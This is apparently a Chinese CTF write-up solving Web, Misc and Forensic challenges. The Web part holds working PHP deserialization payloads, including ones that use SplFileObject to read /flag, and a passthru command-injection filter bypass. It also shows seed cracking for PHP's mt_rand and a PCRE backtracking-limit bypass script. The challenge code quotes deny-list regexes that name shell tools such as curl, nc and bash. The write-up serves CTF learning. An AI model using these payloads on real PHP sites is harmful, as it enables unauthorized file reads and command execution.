Web
flag在哪里
<?php
error_reporting(0);
class begin{
public $file;
public $mode;
public $content;
public $choice;
public function __construct()
{
$this->file = "file";
$this->content = "content";
}
function __wakeup()
{
if($this->mode=="write"){
$this->choice= new write();
}
if($this->mode=="read"){
$this->choice= new read();
}
}
function __call($file,$content) {
highlight_file($this->file);
}
function __destruct(){
if($this->mode=="write"){
$this->choice->writewritetxt($this->file,$this->content);
}
else{
$this->choice->open($this->file);
}
}
}
class write{
public function writewritetxt($file,$content)
{
$filename=$file.".txt";
if(is_file($filename)){
unlink($filename);
}
file_put_contents($filename, $content);
echo "成功写入";
}
}
class read{
public $file;
public function __construct(){
$this->file="test.txt";
echo "欢迎查看 ".$this->file."<br/>";
}
function open($filename){
$file=$this->file;
if(is_file($file)){
if($file=="getflag.php"){
die("getflag.php没东西");
}
else{
highlight_file($file);
}
}else{
echo "文件不存在";
}
}
}
function check($dis_content){
if(preg_match('/system|eval|wget|exec|zip|passthru|netcat|phpinfo|`|shell|\(|\)/i', $dis_content)){
die("hack !!!");
}
}
$pop=$_GET['pop'];
if (isset($pop)) {
check($pop);
unserialize($pop);
} else {
highlight_file("index.php");
}
?>
highlight_file()<-begin::__call()<-begin::open()
<?php
error_reporting(0);
class begin{
public $file;
public $mode;
public $content;
public $choice;
public function __construct()
{
$this->file = "getflag.php";
$this->content = "mochu7";
$this->mode = "";
}
}
$res = new begin();
$res->choice = new begin();
echo urlencode(serialize($res));
?>
PS C:\Users\Administrator\Desktop> php -f .\poc.php
O%3A5%3A%22begin%22%3A4%3A%7Bs%3A4%3A%22file%22%3Bs%3A11%3A%22getflag.php%22%3Bs%3A4%3A%22mode%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22content%22%3Bs%3A6%3A%22mochu7%22%3Bs%3A6%3A%22choice%22%3BO%3A5%3A%22begin%22%3A4%3A%7Bs%3A4%3A%22file%22%3Bs%3A11%3A%22getflag.php%22%3Bs%3A4%3A%22mode%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22content%22%3Bs%3A6%3A%22mochu7%22%3Bs%3A6%3A%22choice%22%3BN%3B%7D%7D
getflag.php
<?php
error_reporting(0);
$a=$_POST['a'];
$b=$_POST['b'];
if(preg_match('/cat|more|less|head|tac|tail|nl|od|vi|sort|cut|ping|curl|nc|grep|system|exec|bash|unique|find|popen|open|ls|rm|sleep|chr|ord|bin|hex|dict|#|`|\$|\<|\(|\[|\]|\{|\}|\)|\>|\_|\'|"|\*|;|\||&|\/|\\\\/is', $a)){
die("hack!!!!");
}
if(!preg_match('/[a-z]/is', $b))
{
die("big hack!!!!");
}
call_user_func($b,$a);
b=passthru&a=dir
b=passthru&a=rev ?f?l?a?g.php
>>> flag='php?< ;)(tixe ;"}as211-csq-53vd-1vdv-5ads{galf" ohce >?'
>>> flag[::-1]
'?> echo "flag{sda5-vdv1-dv35-qsc-112sa}"; exit(); <?php'
寻宝奇兵
第一关
<?php
$SECRET="There is no treasure here";
if (isset($_COOKIE["users"])) {
if($_COOKIE["users"]==="explorer")
{
die("Explorers are not welcome");
}
$hash = $_COOKIE["hash"];
$users = $_COOKIE["users"];
if($hash === md5($SECRET.$users)){
echo "<script>alert('恭喜')</script>";
}
} else {
setcookie("users", "explorer");
setcookie("hash", md5($SECRET . "explorer"));
}
?>
PS C:\Users\Administrator\Desktop> php -r "var_dump(md5('There is no treasure here'.'mochu7'));"
Command line code:1:
string(32) "d8951489320b4ea46f62d9747c1f587a"
hash=d8951489320b4ea46f62d9747c1f587a
user=mochu7
第二关
<?php
session_start();
if(!isset($_SESSION['seed'])){
$_SESSION['seed']=rand(0,999999999);
}
mt_srand($_SESSION['seed']);
$table = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$pass='';
for ( $i = 0; $i < 24; $i++ ){
$pass.=substr($table, mt_rand(0, strlen($table) - 1), 1);
}
if(isset($_POST['password'])){
if($pass==$_POST['password']){
echo "<script >alert('恭喜你')</script>";
}
破解伪随机数,给出了生成伪随机数的前十二位:kv34bCTSCMnW
可以通过这些字符串的位置来反推得到mt_rand(0, strlen($table) - 1)
生成的随机数
将伪随机数转换成php_mt_seed可以识别的数据格式
userpass = "kv34bCTSCMnW"
table = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
out_str = ""
for idx1 in range(len(userpass)):
for idx2 in range(len(table)):
if userpass[idx1] == table[idx2]:
out_str += str(idx2)+' '+str(idx2)+' '+'0'+' '+str(len(table)-1)+' '
print(out_str)
PS C:\Users\Administrator\Desktop> python .\code.py
10 10 0 61 21 21 0 61 29 29 0 61 30 30 0 61 1 1 0 61 38 38 0 61 55 55 0 61 54 54 0 61 38 38 0 61 48 48 0 61 13 13 0 61 58 58 0 61
使用php_mt_seed
爆破seed
root@mochu7-pc:/mnt/d/Tools/Web/php_mt_seed# ./php_mt_seed 10 10 0 61 21 21 0 61 29 29 0 61 30 30 0 61 1 1 0 61 38 38 0 61 55 55 0 61 54 54 0 61 38 38 0 61 48 48 0 61 13 13 0 61 58 58 0 61
Pattern: EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62
Version: 3.0.7 to 5.2.0
Found 0, trying 0xfc000000 - 0xffffffff, speed 1776.4 Mseeds/s
Version: 5.2.1+
Found 0, trying 0x14000000 - 0x15ffffff, speed 145.3 Mseeds/s
seed = 0x1464b1df = 342143455 (PHP 7.1.0+)
Found 1, trying 0xfe000000 - 0xffffffff, speed 131.4 Mseeds/s
Found 1
然后再生成密码
<?php
mt_srand(342143455);
$table = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$pass='';
for ( $i = 0; $i < 24; $i++ ){
$pass.=substr($table, mt_rand(0, strlen($table) - 1), 1);
}
echo $pass;
?>
PS C:\Users\Administrator\Desktop> php -f .\generate.php
kv34bCTSCMnWckt0yshMVbBE
第三关
<?php
function is_php($data){
return preg_match('/[flag].*[php]/is', $data);
}
if($_POST['treasure'])
{
if(is_php($_POST['treasure'])) {
echo "<script >alert('这个不能拿走');</script>";
} else {
if(preg_match('/flag.php/is', $_POST['treasure'])){
highlight_file('flag.php');
}
}
}
?>
这里把正则的返回值作为判断条件,直接可以利用利用PCRE回溯次数限制
import requests
burp0_url = "http://119.61.19.212:57305/treasure.php"
burp0_cookies = {"users": "mochu7", "hash": "d8951489320b4ea46f62d9747c1f587a", "PHPSESSID": "4dg0t8t3g9dtfocod561hjr2c8"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://119.61.19.212:57305", "Connection": "close", "Referer": "http://119.61.19.212:57305/treasure.php", "Upgrade-Insecure-Requests": "1"}
payload = "flag.php" + 'a'*1000000
burp0_data = {"treasure": payload}
res = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
print(res.text)
mid
serialize
<?php
error_reporting(0);
highlight_file(__FILE__);
class Demo{
public $class;
public $user;
public function __construct()
{
$this->class = "safe";
$this->user = "ctfer";
$context = new $this->class ($this->user);
foreach($context as $f){
echo $f;
}
}
public function __wakeup()
{
$context = new $this->class ($this->user);
foreach($context as $f){
echo $f;
}
}
}
class safe{
var $user;
public function __construct($user)
{
$this->user = $user;
echo ("hello ".$this->user);
}
}
if(isset($_GET['data'])){
unserialize($_GET['data']);
}
else{
$demo=new Demo;
直接拼接原生类
poc.php
<?php
class Demo{
public $class;
public $user;
public function __construct(){
$this->class = "FilesystemIterator";
$this->user = "./";
}
}
$res = new Demo();
echo urlencode(serialize($res));
?>
?data=O%3A4%3A%22Demo%22%3A2%3A%7Bs%3A5%3A%22class%22%3Bs%3A18%3A%22FilesystemIterator%22%3Bs%3A4%3A%22user%22%3Bs%3A2%3A%22.%2F%22%3B%7D
<?php
class Demo{
public $class;
public $user;
public function __construct(){
$this->class = "SplFileObject";
$this->user = "./flag.php";
}
}
$res = new Demo();
echo urlencode(serialize($res));
?>
/?data=O%3A4%3A%22Demo%22%3A2%3A%7Bs%3A5%3A%22class%22%3Bs%3A13%3A%22SplFileObject%22%3Bs%3A4%3A%22user%22%3Bs%3A10%3A%22.%2Fflag.php%22%3B%7D
查看根目录发现flag
读取
/?data=O%3A4%3A%22Demo%22%3A2%3A%7Bs%3A5%3A%22class%22%3Bs%3A13%3A%22SplFileObject%22%3Bs%3A4%3A%22user%22%3Bs%3A5%3A%22%2Fflag%22%3B%7D
Misc
签到1
PS C:\Users\Administrator> php -r "var_dump(base64_decode('ZmxhZ3tjNTRjZTlkN2I0ZTE3OTgwZGQ0OTA2ZDk5NDFlZDUyYX0='));"
Command line code:1:
string(38) "flag{c54ce9d7b4e17980dd4906d9941ed52a}"
DECODER
flag_1.txt
base32->base58->base85
- Base32: https://www.qqxiuzi.cn/bianma/base.php
- Base58: http://www.metools.info/code/c74.html
- Base85: http://www.hiencode.com/base85.html
042f38b694
flag_2.txt
cipher:👉🦓🏎💵🕹🚪🎤🙃☂☀🌏🛩💵😇🚨🚪🎤👉🔪👣🐎✖☂🎤✉🔪😊🍎🚰🌪🚪🚹🍌🚰🎃🎤💧😎🥋🍎✖🎃👉🍵
key:👮👟👟👡👥👦
调整Rotation
b52bff9568
flag_3.txt
Base91->Base64隐写
def get_base64_diff_value(s1, s2):
base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
res = 0
for i in xrange(len(s2)):
if s1[i] != s2[i]:
return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))
return res
def solve_stego():
with open('./1.txt', 'rb') as f:
file_lines = f.readlines()
bin_str = ''
for line in file_lines:
steg_line = line.replace('\n', '')
norm_line = line.replace('\n', '').decode('base64').encode('base64').replace('\n', '')
diff = get_base64_diff_value(steg_line, norm_line)
print diff
pads_num = steg_line.count('=')
if diff:
bin_str += bin(diff)[2:].zfill(pads_num * 2)
else:
bin_str += '0' * pads_num * 2
print goflag(bin_str)
def goflag(bin_str):
res_str = ''
for i in xrange(0, len(bin_str), 8):
res_str += chr(int(bin_str[i:i + 8], 2))
return res_str
if __name__ == '__main__':
solve_stego()
37f267472516
最终flag
flag{042f38b694b52bff956837f267472516}
huahua
修改文件头
解压得到png文件,插入四字节文件头
flag{b3afc91a8fbb6cc798bdebb253b02550}
NOISE
out
文件是个wav
文件
改后缀out.wav
用Audacity
打开,查看频谱图
flag{98ce526ad52c409763405847185d9c6c}
DdDdDd
DdDdDd.pcap
导出HTTP对象
打开这个最大的文件
G语言
,直接在线编译
右上角调角度
flag{2fc07441-fd8f-4e1c-9f0f-72aa8c984a}
Forensic
flag.zip
导不出来,flag.docx
有两个,导出来一个有加密,另一个打开有一段隐藏Base64字符
PS D:\Tools\Misc\volatility_2.6_win64_standalone> php -r "var_dump(base64_decode('ZmxhZ3s5MDE3Y2VmMjZhMDdiZWI0ZTY2OWE0YTgwNmJjZDliNn0='));"
Command line code:1:
string(38) "flag{9017cef26a07beb4e669a4a806bcd9b6}"
隐藏的数据
flag.zip
伪加密,7zip
直接解压,key.docx
发现隐藏字符
$Th1S_1S_P@SSW0Rd#####
解压出来的flag
文件还是zip文件,改后缀再次解压,使用上面的得到的密码发现不对;上ARCHPR
爆破一波
非常常见的四位纯数字密码:0546
解压得到的flag
文件还是zip文件,改后缀解压,有密码,直接用前面得到的密码
解压得到docx文档打开没有flag,修改docx后缀为zip
解压后grep -rn 'flag{' ./*
直接找
flag{4de41c0b106051b30cb3c654901b1b06}
something in picture
强网杯三体原题
flag{D1mEn5i0nAl_Pr061em}